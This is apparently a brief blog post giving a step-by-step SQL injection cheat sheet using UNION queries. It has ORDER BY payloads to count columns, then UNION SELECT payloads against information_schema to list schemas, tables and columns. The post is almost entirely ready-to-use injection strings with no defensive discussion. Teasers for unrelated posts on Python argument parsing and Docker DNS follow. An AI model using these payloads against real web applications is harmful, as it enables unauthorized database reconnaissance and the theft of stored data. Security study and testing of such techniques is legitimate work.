SQL injection with UNION



First - identify number of columns using order by clause:


1 order by 1 --

1 order by 2 --

.

.

.

When error shows  means that reached number of columns in select statement.


Then find out schem a name:

1 union select schema_name,null,null,null from information_schema.schemata --



Next,  find table name:

1 UNION SELECT table_name,TABLE_ROWS,TABLE_SCHEMA,null FROM information_schema.tables --


... and column names:

1 UNION select column_name,table_name, table_schema,null from information_schema.columns --





Comentarii

Trimiteți un comentariu

Postări populare de pe acest blog

Process Command Line Arguments in Python

To access command line arguments in python one can use sys.argv. sys.argv is a list containing the parameters with which the script was called, including the name of the script at index 0 of the list - sys.argv[0], so in sys.argv[1:] we find the arguments with which the script was called. To parse the list of arguments, getopt.getopt is used. Syntax: getopt.getopt(args, options, [long_options]) (Options that require an argument should be followed by a colon (:).) See the example below: try :         ( options , args ) = getopt . getopt ( sys . argv [ 1 :], 'n:hv' )     except getopt . GetoptError :         usage ()     if len ( args ) != 1 :         usage ()     for ( opt , optval ) in options :         if opt == "-n" :             name = optval         elif opt == "-h" :             sho...
Citiți mai multe

Docker compose DNS resolution

  Docker Compose relies on an internal DNS server to manage and resolve service names across containers within a network. Each container’s /etc/hosts file contains basic entries for local resolution, but inter-container communication is primarily handled through Docker’s internal DNS. Each container is assigned a hostname that matches the service name defined in the docker-compose.yml file. Docker’s internal DNS server keeps track of these hostnames and their corresponding container IP addresses. When a container needs to resolve another service’s name, it queries the internal DNS server. Custom entries can be added to the /etc/hosts file of containers using the extra_hosts option in the docker-compose.yml file. This allows you to define additional hostname-to-IP address mappings that will be included in each container's /etc/hosts file. How works extra_hosts: The extra_hosts option allows you to specify additional hostname-to-IP address mappings. Each entry is defined in th...
Citiți mai multe